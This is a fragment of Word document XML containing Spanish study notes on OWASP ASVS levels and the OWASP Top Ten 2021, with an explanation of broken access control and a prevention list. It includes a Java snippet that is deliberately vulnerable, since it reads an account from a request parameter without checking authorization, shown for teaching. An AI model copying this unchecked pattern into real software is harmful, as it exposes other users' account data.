          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Niveles de ASVS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D948DDA" w14:textId="275E6B18" w:rsidR="00E133A4" w:rsidRPr="00E133A4" w:rsidRDefault="00E133A4" w:rsidP="00E133A4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">ASVS Nivel 1 (L1): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Para bajos niveles de garantía, y es completamente comprobable con pentesting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70E138" w14:textId="468B3C8B" w:rsidR="00E133A4" w:rsidRPr="00E133A4" w:rsidRDefault="00E133A4" w:rsidP="00E133A4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">ASVS Nivel 2 (L2): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Para apps con datos confidenciales, requiere protección y es el nivel recomendado para la mayoría de las apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9F6E6F" w14:textId="05EC06B9" w:rsidR="00E133A4" w:rsidRPr="00E133A4" w:rsidRDefault="00E133A4" w:rsidP="00E133A4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">ASVS Nivel 3 (L3): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Para apps más críticas que realizan transacciones de alto valor, contienen datos sensibles, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663EAB73" w14:textId="6CF38CB2" w:rsidR="00712564" w:rsidRPr="00BA754D" w:rsidRDefault="00F842F7" w:rsidP="000E77E4">
      <w:r w:rsidRPr="003A59BE">
        <w:br/>
      </w:r>
      <w:r w:rsidR="001C0B45" w:rsidRPr="00BA754D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Top Ten Web Application Security Risks 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B82CBB2" w14:textId="77777777" w:rsidR="000E77E4" w:rsidRDefault="00712564" w:rsidP="000E77E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A01 </w:t>
      </w:r>
      <w:r w:rsidR="00690BA4" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r w:rsidR="00690BA4" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">rdida de </w:t>
      </w:r>
      <w:r w:rsidR="00690BA4" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ontrol de </w:t>
      </w:r>
      <w:r w:rsidR="00690BA4" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cceso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5F52CA" w14:textId="77777777" w:rsidR="000E77E4" w:rsidRDefault="00712564" w:rsidP="000E77E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A02 </w:t>
      </w:r>
      <w:r w:rsidR="00690BA4" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fallas </w:t>
      </w:r>
      <w:r w:rsidR="00F842F7" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Criptográficas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCAABB9" w14:textId="77777777" w:rsidR="000E77E4" w:rsidRDefault="00712564" w:rsidP="000E77E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A03 – Inyección</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D47386" w14:textId="77777777" w:rsidR="000E77E4" w:rsidRDefault="00712564" w:rsidP="000E77E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A04 – Diseño </w:t>
      </w:r>
      <w:r w:rsidR="00F842F7" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nseguro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D14EB1F" w14:textId="77777777" w:rsidR="000E77E4" w:rsidRDefault="00712564" w:rsidP="000E77E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A05 – Configuración de Seguridad Incorrecta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70065A54" w14:textId="77777777" w:rsidR="000E77E4" w:rsidRDefault="00712564" w:rsidP="000E77E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A06 – Componentes Vulnerables y Desactualizados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20372566" w14:textId="77777777" w:rsidR="000E77E4" w:rsidRDefault="00712564" w:rsidP="000E77E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A07 – Fallas de Identif</w:t>
      </w:r>
      <w:r w:rsidR="00F842F7" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ic</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ación y Autenticación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0C9090" w14:textId="77777777" w:rsidR="000E77E4" w:rsidRDefault="00712564" w:rsidP="000E77E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A08 – Fallas en el Software y en la Integridad de los</w:t>
      </w:r>
      <w:r w:rsidR="00F842F7" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> D</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>atos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3052BB" w14:textId="77777777" w:rsidR="000E77E4" w:rsidRDefault="00712564" w:rsidP="000E77E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A09 – Fallas en el Registro y </w:t>
      </w:r>
      <w:r w:rsidR="00F842F7" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>onitoreo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4446D4" w14:textId="7C7FB42E" w:rsidR="00712564" w:rsidRPr="000E77E4" w:rsidRDefault="00712564" w:rsidP="000E77E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A10 – Falsificación de </w:t>
      </w:r>
      <w:r w:rsidR="00F842F7" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">olicitudes del </w:t>
      </w:r>
      <w:r w:rsidR="00F842F7" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ado del</w:t>
      </w:r>
      <w:r w:rsidR="00F842F7" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ervidor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5DE3A6" w14:textId="77777777" w:rsidR="00712564" w:rsidRDefault="00712564" w:rsidP="004C318E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF3065D" w14:textId="1C300315" w:rsidR="00712564" w:rsidRPr="000E77E4" w:rsidRDefault="00712564" w:rsidP="000E77E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A01 – Pérdida del </w:t>
      </w:r>
      <w:r w:rsidR="009E0158" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ontrol de </w:t>
      </w:r>
      <w:r w:rsidR="009E0158" w:rsidRPr="000E77E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="000E77E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cceso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4220D4DA" w14:textId="77777777" w:rsidR="00125191" w:rsidRPr="00AE18AA" w:rsidRDefault="00712564" w:rsidP="00125191">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Las aplicaciones deberían realizar la </w:t>
      </w:r>
      <w:r w:rsidR="009E0158">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>verificación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de nivel de acceso a las funciones del lado del servidor al momento </w:t>
      </w:r>
      <w:r w:rsidR="000E77E4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que cada función y/o dato es accedido</w:t>
      </w:r>
      <w:r w:rsidR="004C0118">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Si no los atacantes serán capaces de forzar peticiones con la finalidad de acceder a la funcionalidad sin la autorización apropiada.</w:t>
      </w:r>
      <w:r w:rsidR="004C0118">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>Este tipo de vulnerabilidades suceden cuando la aplicación no protege adecuadamente las páginas de destino.</w:t>
      </w:r>
      <w:r w:rsidR="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00125191" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo: </w:t>
      </w:r>
      <w:r w:rsidR="00125191" w:rsidRPr="00125191">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00125191" w:rsidRPr="00B3158C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>http://ejemplo.com/app/getappInfo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00125191" w:rsidRPr="00B3158C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>http://ejemplo.com/app/admin_getappInfo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00125191" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; si un atacante puede acceder a esta URL sin permisos, eso es un fallo y puede llevar al atacante a páginas de administración que no están debidamente protegidas. Pudiendo así acceder a información por medio de sentencias SQL tales como: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC3FA0B" w14:textId="77777777" w:rsidR="00125191" w:rsidRDefault="00125191" w:rsidP="00125191">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>String query = “SELECT * FROM accts WHERE account =?”;</w:t>
      </w:r>
      <w:r w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">PreparedStatement pstmt = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>connection.prepareStatement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>(query, …);</w:t>
      </w:r>
      <w:r w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:br/>
        <w:t>pstmt.setString(1, request.getparameter(“acct”));</w:t>
      </w:r>
      <w:r w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:br/>
        <w:t>ResultSet results = pstmt.e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>xecuteQuery();</w:t>
      </w:r>
      <w:r w:rsidR="00712564" w:rsidRPr="00125191">
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">El atacante modificara el parámetro “acct” para enviar cualquier numero de cuenta que quiera. </w:t>
      </w:r>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7866E3" w14:textId="77777777" w:rsidR="00125191" w:rsidRPr="00125191" w:rsidRDefault="004C0118" w:rsidP="00125191">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125191">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prevención</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F5FC35" w14:textId="77777777" w:rsidR="00125191" w:rsidRPr="00125191" w:rsidRDefault="004C0118" w:rsidP="00125191">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Usar referencias indirectas por usuario o sesión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48963502" w14:textId="77777777" w:rsidR="00125191" w:rsidRPr="00125191" w:rsidRDefault="00125191" w:rsidP="00125191">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>omprobar el nivel de acceso al objeto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD0D40B" w14:textId="77777777" w:rsidR="00125191" w:rsidRPr="00125191" w:rsidRDefault="00125191" w:rsidP="00125191">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ontrol de acceso único y reutilizado en toda la aplicación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E862A9" w14:textId="77777777" w:rsidR="00125191" w:rsidRPr="00125191" w:rsidRDefault="00125191" w:rsidP="00125191">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>eshabilitar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el listado de directorios del servidor web y asegurar metadatos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E16F9D1" w14:textId="77777777" w:rsidR="00125191" w:rsidRPr="00125191" w:rsidRDefault="00125191" w:rsidP="00125191">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">imite la tasa de acceso a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>APIs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y al control de acceso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3227431F" w14:textId="77777777" w:rsidR="00125191" w:rsidRPr="00125191" w:rsidRDefault="00125191" w:rsidP="00125191">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>os tokens JWT deben ser invalidados luego de la finalización de la sesión por parte del usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3824BDFE" w14:textId="77777777" w:rsidR="00125191" w:rsidRPr="00125191" w:rsidRDefault="00125191" w:rsidP="00125191">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>estión de acceso y permisos actualizados y auditables fácilmente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1756D137" w14:textId="77777777" w:rsidR="00125191" w:rsidRPr="00125191" w:rsidRDefault="00125191" w:rsidP="00125191">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o debe haber acceso por defecto y debe</w:t>
      </w:r>
      <w:r w:rsidR="009E0158" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> ser requerido</w:t>
      </w:r>
      <w:r w:rsidR="009E0158" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> permisos por roles para cada funcionalidad</w:t>
      </w:r>
      <w:r w:rsidR="009E0158" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
